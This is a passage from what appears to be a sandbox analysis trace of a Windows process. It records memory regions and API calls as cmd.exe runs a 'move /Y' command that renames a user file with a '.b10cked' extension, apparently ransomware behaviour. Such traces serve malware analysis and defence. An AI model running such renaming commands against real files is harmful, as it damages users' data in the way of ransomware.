"pagefile_0x0000000000010000" filename = "" Region: id = 32520 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32521 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32522 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 32523 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 32524 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32525 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32526 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32527 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32528 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32529 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32530 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32531 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32532 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32533 start_va = 0x410000 end_va = 0x4d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 32534 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32535 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32536 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 32537 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 32538 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 32539 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 32540 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 32541 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 32542 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Thread: id = 762 os_tid = 0xf54 [0217.888] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa54 | out: lpSystemTimeAsFileTime=0x26fa54*(dwLowDateTime=0xb6abe3e0, dwHighDateTime=0x1d440a9)) [0217.888] GetCurrentProcessId () returned 0xa84 [0217.888] GetCurrentThreadId () returned 0xf54 [0217.888] GetTickCount () returned 0x3ce65 [0217.888] QueryPerformanceCounter (in: lpPerformanceCount=0x26fa4c | out: lpPerformanceCount=0x26fa4c*=27467769864) returned 1 [0217.889] GetModuleHandleA (lpModuleName=0x0) returned 0x49fd0000 [0217.889] __set_app_type (_Type=0x1) [0217.889] __p__fmode () returned 0x76b331f4 [0217.889] __p__commode () returned 0x76b331fc [0217.889] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ff21a6) returned 0x0 [0217.889] __getmainargs (in: _Argc=0x49ff4238, _Argv=0x49ff4240, _Env=0x49ff423c, _DoWildCard=0, _StartInfo=0x49ff4140 | out: _Argc=0x49ff4238, _Argv=0x49ff4240, _Env=0x49ff423c) returned 0 [0217.890] GetCurrentThreadId () returned 0xf54 [0217.890] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf54) returned 0x38 [0217.890] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0217.890] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0217.890] SetThreadUILanguage (LangId=0x0) returned 0x409 [0217.890] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0217.890] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f9e4 | out: phkResult=0x26f9e4*=0x0) returned 0x2 [0217.890] VirtualQuery (in: lpAddress=0x26fa1b, lpBuffer=0x26f9b4, dwLength=0x1c | out: lpBuffer=0x26f9b4*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0217.890] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f9b4, dwLength=0x1c | out: lpBuffer=0x26f9b4*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0217.890] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f9b4, dwLength=0x1c | out: lpBuffer=0x26f9b4*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0217.890] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f9b4, dwLength=0x1c | out: lpBuffer=0x26f9b4*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0217.890] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f9b4, dwLength=0x1c | out: lpBuffer=0x26f9b4*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0217.890] GetConsoleOutputCP () returned 0x1b5 [0217.890] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0217.890] SetConsoleCtrlHandler (HandlerRoutine=0x49fee72a, Add=1) returned 1 [0217.890] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.890] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0217.891] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.891] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ff41ac | out: lpMode=0x49ff41ac) returned 1 [0217.891] _get_osfhandle (_FileHandle=1) returned 0x7 [0217.891] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0217.891] _get_osfhandle (_FileHandle=0) returned 0x3 [0217.891] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ff41b0 | out: lpMode=0x49ff41b0) returned 1 [0217.891] _get_osfhandle (_FileHandle=0) returned 0x3 [0217.891] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0217.891] GetEnvironmentStringsW () returned 0x320190* [0217.892] FreeEnvironmentStringsW (penv=0x320190) returned 1 [0217.892] GetEnvironmentStringsW () returned 0x320190* [0217.892] FreeEnvironmentStringsW (penv=0x320190) returned 1 [0217.892] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e954 | out: phkResult=0x26e954*=0x40) returned 0x0 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x0, lpData=0x26e960*=0xb8, lpcbData=0x26e958*=0x1000) returned 0x2 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x4, lpData=0x26e960*=0x1, lpcbData=0x26e958*=0x4) returned 0x0 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x0, lpData=0x26e960*=0x1, lpcbData=0x26e958*=0x1000) returned 0x2 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x4, lpData=0x26e960*=0x0, lpcbData=0x26e958*=0x4) returned 0x0 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x4, lpData=0x26e960*=0x40, lpcbData=0x26e958*=0x4) returned 0x0 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x4, lpData=0x26e960*=0x40, lpcbData=0x26e958*=0x4) returned 0x0 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x0, lpData=0x26e960*=0x40, lpcbData=0x26e958*=0x1000) returned 0x2 [0217.892] RegCloseKey (hKey=0x40) returned 0x0 [0217.892] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e954 | out: phkResult=0x26e954*=0x40) returned 0x0 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x0, lpData=0x26e960*=0x40, lpcbData=0x26e958*=0x1000) returned 0x2 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x4, lpData=0x26e960*=0x1, lpcbData=0x26e958*=0x4) returned 0x0 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x0, lpData=0x26e960*=0x1, lpcbData=0x26e958*=0x1000) returned 0x2 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x4, lpData=0x26e960*=0x0, lpcbData=0x26e958*=0x4) returned 0x0 [0217.892] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x4, lpData=0x26e960*=0x9, lpcbData=0x26e958*=0x4) returned 0x0 [0217.893] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x4, lpData=0x26e960*=0x9, lpcbData=0x26e958*=0x4) returned 0x0 [0217.893] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e95c, lpData=0x26e960, lpcbData=0x26e958*=0x1000 | out: lpType=0x26e95c*=0x0, lpData=0x26e960*=0x9, lpcbData=0x26e958*=0x1000) returned 0x2 [0217.893] RegCloseKey (hKey=0x40) returned 0x0 [0217.893] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b3 [0217.893] srand (_Seed=0x5b8863b3) [0217.893] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\INDEXE~1.SEA\" \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked\"" [0217.893] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Searches\\INDEXE~1.SEA\" \"C:\\Users\\Default\\Searches\\Indexed Locations.search-ms.b10cked\"" [0217.893] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ff5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.893] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0217.893] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0217.893] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0217.894] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0217.894] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0217.894] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0217.894] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0217.894] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0217.894] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0217.894] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0217.894] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0217.894] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0217.894] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0217.894] GetEnvironmentStringsW () returned 0x3222e0* [0217.894] FreeEnvironmentStringsW (penv=0x3222e0) returned 1 [0217.894] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.894] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a000640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0217.894] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0217.894] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0217.894] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0217.894] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0217.894] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0217.894] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0217.894] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0217.894] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0217.894] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f720 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.895] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f720, lpFilePart=0x26f71c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f71c*="Desktop") returned 0x18 [0217.895] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0217.895] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f49c | out: lpFindFileData=0x26f49c) returned 0x320020 [0217.895] FindClose (in: hFindFile=0x320020 | out: hFindFile=0x320020) returned 1 [0217.895] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f49c | out: lpFindFileData=0x26f49c) returned 0x320020 [0217.895] FindClose (in: hFindFile=0x320020 | out: hFindFile=0x320020) returned 1 [0217.895] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f49c | out: lpFindFileData=0x26f49c) returned 0x320020 [0217.895] FindClose (in: hFindFile=0x320020 | out: hFindFile=0x320020) returned 1 [0217.895] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0217.895] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0217.895] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0217.896] GetEnvironmentStringsW () returned 0x322b00* [0217.896] FreeEnvironmentStringsW (penv=0x322b00) returned 1 [0217.896] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ff5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.896] GetConsoleOutputCP () returned 0x1b5 [0217.896] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ff4260 | out: lpCPInfo=0x49ff4260) returned 1 [0217.896] GetUserDefaultLCID () returned 0x409 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ff4950, cchData=8 | out: lpLCData=":") returned 2 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f860, cchData=128 | out: lpLCData="0") returned 2 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f860, cchData=128 | out: lpLCData="0") returned 2 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f860, cchData=128 | out: lpLCData="1") returned 2 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49ff4940, cchData=8 | out: lpLCData="/") returned 2 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49ff4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49ff4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49ff4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49ff4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49ff4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49ff4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0217.897] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49ff4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0217.898] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ff4930, cchData=8 | out: lpLCData=".") returned 2 [0217.898] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49ff4920, cchData=8 | out: lpLCData=",") returned 2 [0217.898] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0217.899] GetConsoleTitleW (in: lpConsoleTitle=0x3108e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.899] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0217.899] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0217.899] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0217.899] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0217.900] _wcsicmp (_String1="move", _String2=")") returned 68 [0217.900] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0217.900] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0217.900] _wcsicmp (_String1="IF", _String2="move") returned -4 [0217.900] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0217.900] _wcsicmp (_String1="REM", _String2="move") returned 5 [0217.900] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0217.903] GetConsoleTitleW (in: lpConsoleTitle=0x26f558, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0217.994] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0217.994] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0217.994] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0217.994] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0217.994] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0217.994] _wcsicmp (_String1="move", _String2="CD") returned 10 [0217.994] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0217.994] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0217.994] _wcsicmp (_String1="move", _String2="REN") returned -5 [0217.994] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0217.994] _wcsicmp (_String1="move", _String2="SET") returned -6 [0217.994] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0217.994] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0217.995] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0217.995] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0217.995] _wcsicmp (_String1="move", _String2="MD") returned 11 [0217.995] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0217.995] _wcsicmp (_String1="move", _String2="RD") returned -5 [0217.995] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0217.995] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0217.995] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0217.995] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0217.995] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0217.995] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0217.995] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0217.995] _wcsicmp (_String1="move", _String2="VER") returned -9 [0217.995] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0217.995] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0217.995] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0217.995] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0217.995] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0217.995] _wcsicmp (_String1="move", _String2="START") returned -6 [0217.995] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0217.995] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0217.995] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0217.996] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.996] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0217.996] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f314, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f30c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f30c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0217.997] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0217.998] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0217.998] _wcsicmp (_String1="INDEXE~1.SEA", _String2=".") returned 59 [0217.998] _wcsicmp (_String1="INDEXE~1.SEA", _String2="..") returned 59 [0217.998] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Searches\\INDEXE~1.SEA" (normalized: "c:\\users\\default\\searches\\indexe~1.sea")) returned 0x20 [0217.998] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321e58 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0217.998] SetErrorMode (uMode=0x0) returned 0x0 [0217.998] SetErrorMode (uMode=0x1) returned 0x0 [0217.998] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\Searches\\INDEXE~1.SEA", nBufferLength=0x104, lpBuffer=0x26ec9c, 